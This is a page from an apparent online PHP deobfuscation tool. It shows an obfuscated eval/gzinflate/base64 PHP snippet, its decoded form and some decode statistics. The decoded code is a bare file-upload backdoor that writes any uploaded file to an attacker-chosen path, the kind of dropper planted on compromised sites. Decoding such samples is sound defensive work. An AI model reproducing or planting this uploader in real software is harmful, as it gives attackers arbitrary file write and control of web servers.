Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? eval(gzinflate(base64_decode('XVHdSsMwFL7uYO+QhUIcuBavmwRBJojC1G1Xo5SsTUkwaUN3Ohziu5tk..
Decoded Output download
$files = @$_FILES["files"];
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
}
}
echo '<html><head><title>Upload files...</title></head><body>
<form method=POST enctype="multipart/form-data" action="">
<input type=text name=path>
<input type="file" name="files"><input type=submit value="Up"></form></body></html>';
Did this file decode correctly?
Original Code
<?
eval(gzinflate(base64_decode('XVHdSsMwFL7uYO+QhUIcuBavmwRBJojC1G1Xo5SsTUkwaUN3Ohziu5tkOtSrkPP9niRttZEHxNBtWt0/PC3XOxwnuCyS6STR7VUa7zvcCStxiWYMETL/8FiStqMxToDy8rR6Xb5sl+vNDocJLrO/uiIJdsHP9kdZjc70opFNFUg/EQSsqwKdlNcX7/k5K5G16hGm6oZTgdQgW0YuHMJXj4s7o+s3pOQgZzQXnOaeioug/Uxi+Od0Ek0IVWANp0qKhlPQYCTfxj4o9siyjObnsTeJpH3fnPh0Qtt+sMhKUH3DnlfrDZJdDScnGbajAe3EAHngLBoBAiNRg+47hnHQ6s6NgCIb5DugsCgL7f+B8f3xGf7+C/4bP4x7qwEdhRk9Yes8GjP9EWv6zmE9UnwB')));
?>
Function Calls
gzinflate | 1 |
base64_decode | 1 |
Stats
MD5 | 2121e443a1f64b88f2629a77d31dae8f |
Eval Count | 1 |
Decode Time | 97 ms |